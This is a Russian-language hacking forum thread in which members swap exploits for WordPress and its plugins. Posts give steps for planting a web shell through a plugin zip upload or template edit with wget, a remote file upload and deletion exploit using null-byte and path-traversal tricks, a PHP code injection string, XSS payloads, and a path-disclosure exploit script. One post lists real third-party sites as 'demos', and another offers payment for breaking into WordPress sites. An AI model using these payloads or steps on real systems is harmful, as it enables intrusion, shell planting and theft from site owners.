[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Через плагины)
     
  2. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
  3. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    подскажите exploit под WordPress 3.4.2
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    WordPress "All-in-One-SEO-Pack V 1.6.15.2" component ActiveXSS

    Уязвим параметр $_POST['aiosp_menulabel']
    Эксплyатация:
    В админ панели при заполнение полей, поле
    Меню метки: передаем
    Дорк: "inurl:/plugins/all-in-one-seo-pack/"


    Уязвимый код:
    Намеренно пока не выкладываю

    P.S:Чуcтвую запах sql-injection.
    Сайт разработчика: _ht_p://sempe[antisearch]rplugins.com/

    P.S: надеюсь не боян, нашел сегодня на последней фри-версии!
     
    _________________________
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а можно хоть прмер или где про ето почитать?
     
  6. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Скачай любой плагин для вп и закинь в архив свой шелл...

    Через редактирование шаблонов измени шаб и залейся через wget например...
     
    1 person likes this.
  7. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Пакуем шелл в зип.
    Например rss_class.php => rss_class.zip
    Добавляем плагин, выбираем наш архив.
    Готово.
    /wp-content/plugins/rss_class/
     
    _________________________
  8. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Через шаблоны не всегда удается залится, ибо могут быть урезаны права на запись.
     
  9. 3ak.aT

    3ak.aT Banned

    Joined:
    1 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities

    PHP:
    wordpress tdo-mini-forms plugin (rfu/rfdVulnerabilities
     
    ------------------------------------------------------------
    wordpress tdo-mini-forms plugin (remote file upload/remote file deletionVulnerabilities
    Auther 
    Cold z3ro www.hackteach.org www.s3curi7y.com
    Anonymous 
    => You are the man 
     
     
    # Remote file upload :
     
    wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
     
    file extension file.php%00;.jpg
    uploaded path 
    :
    wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
     
    Example to uploaded path 
    :
    wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
     
     
     
    # Remote file Deletion
     
    => Note useing Any http POST header modifier .
     
    tdomf_form_id 1;
    deletefile[]  = 1;
    filepath      $varibale wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
    index         NULL
     
    Example to result 

    wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
     
    Eof
     
    # 1337day.com/exploit/19776 [2012-11-21]
    Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
     
  10. v00d

    v00d Member

    Joined:
    11 Oct 2010
    Messages:
    34
    Likes Received:
    10
    Reputations:
    7
    Нашел уязвимость в плагине wp, может кому-то будет полезная.
    Wordpress "count-per-day v3.2.4" plugin PHP Code Execution
    В админке в настройках плагина параметр "Последние счетчики - Дни:"
    Code:
    7);phpinfo(
    Результат:
    Code:
    /wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999
     
    2 people like this.
  11. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

    [+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS
    [+] Found by Angel Injection
    [+] Version: 1.3.11

    Exploit:

    Code:
    http://localhost/?s=[xss here]&x=0&y=0
     
    http://localhost/?s="><script>alert(1)</script>&x=0&y=0
     
    1 person likes this.
  12. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Wordpress 3.5 Active XSS

    Нужны права администратора.


    Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:

    Code:
    [COLOR=White]"><script>alert('XSS Test')</script>[/COLOR]
    [​IMG]

    Проверить можно тут.

    Code:
    L: test
    P: test
    (c) MaxFast aka n3m1s
     
    1 person likes this.
  13. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    MaxFast, бага отработала под акком админа, под гостем идет экранирование.
     
    _________________________
  14. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Wordpress 3.5 Full Path Disclosure

    Exploit:

    Code:
    [COLOR=White]localhost/?cat[B][][/B]=1[/COLOR]
    Result:

    Code:
    [COLOR=White]Warning: urldecode() expects parameter 1 to be string, array given in [B]*path*[/B] on line 1735[/COLOR]
    Example:

    Code:
    [COLOR=White]_tpp://sergeybiryukov.ru/?cat[]=1
    _ttp://wpsymposium.com/?cat[]=1[/COLOR]
    Found by MaxFast aka n3m1s
     
    1 person likes this.
  15. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Wordpress <=3.5 Full Path Disclosure Exploit | By n3m1s and zed0x

    Title: Wordpress <=3.5 Full Path Disclosure Exploit;
    Credits: n3m1s, Zed0x;
    Date: 2012-12-20;
    Source:
    PHP:
    <? 
    error_reporting(0); 
    function 
    is_url($URL) {
      return 
    preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i'$URL);
    }

    function 
    getCat($URL) {
        if(!
    $source file_get_contents($URL '?cat[]=wordpress')) {
            die(
    "<div class='error'><strong>Error</strong> - I can not get the source code for your site.</div>");
        }
        
    preg_match_all("| array given in (.*?)wp-includes|i"$source$m);
        foreach(
    $m[1] as $match) { 
            echo 
    "<div class='result'>" $match "</div>"
        } 
    }
    ?>
    <!DOCTYPE html>
    <html lang="ru">
    <head>
        <title> Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x</title>
        <style type="text/css">
            body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; }
            input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; }
            .error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
            .result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }
        </style>
    </head>
    <body>
    <FORM method="POST" align="center" id="myForm">
        <label><strong>Target:</strong> <input type="text" name="target" value="http://" /></label>
        <input type="submit" name="submit" value="Expl0it!" /> 
    </FORM>
    <?php
    if(isset($_POST['submit']) and !empty($_POST['target'])) {
        
    # Work with URL;
        
    $URL strtolower(htmlspecialchars($_POST['target']));
        if (
    substr($URL, -11) !== '/'$URL $URL '/';
        
    ###

        
    if (!is_url($URL)) die("<div class='error'>URL not valid</div>");
        
    getCat($URL);
    }    
    ?>
    </body>
    </html>
    NOTICE: this exploit for web, do not forget about copyright!
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред.

    У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо.

    В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??
     
    _________________________
  17. bredbaraded

    bredbaraded New Member

    Joined:
    19 Sep 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    C правами админа и iframe можно вставить. :)
     
  18. pharm_all

    pharm_all Member

    Joined:
    10 Sep 2009
    Messages:
    106
    Likes Received:
    7
    Reputations:
    0
    Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.


    +# This affects W3 Total Cache <= 0.9.2.4.

    w3-total-fail.sh
    |


    Code
    http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

    Автор
    http://git.zx2c4.com/w3-total-fail/
     
  19. 3ak.aT

    3ak.aT Banned

    Joined:
    1 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability

    HTML:
    # Author => Zikou-16
    # Download plugin : http://wordpress.org/extend/plugins/slidedeck2/
    
    #=> Exploit Info :
    ------------------
    # The attacker can inject HTML codes & inject a simple file uploader to upload shell
    ------------------
    
    ------------------
    #=> XSS
    ------------------
    http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
    
    inj3ct u'r HTML codes in (Text) then click Copy To Clipboard... 
    
    screenshot #=> http://i49.tinypic.com/1zgqngx.png
    
    ------------------
    #=> Shell Upload
    ------------------
    
    http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
    
    inj3ct u'r simple file uploader & upload u'r shell
    
    screenshot #=> http://i45.tinypic.com/1426mhg.jpg
    
    ------------------
    #=> Demos 
    ------------------
    
    http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
    
    http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
    
    http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
    Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.

    Вопрос: какие идеи?

    © Источник
     
  20. Limbaro

    Limbaro New Member

    Joined:
    25 Oct 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    wordpress

    Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...

    icq: 640831391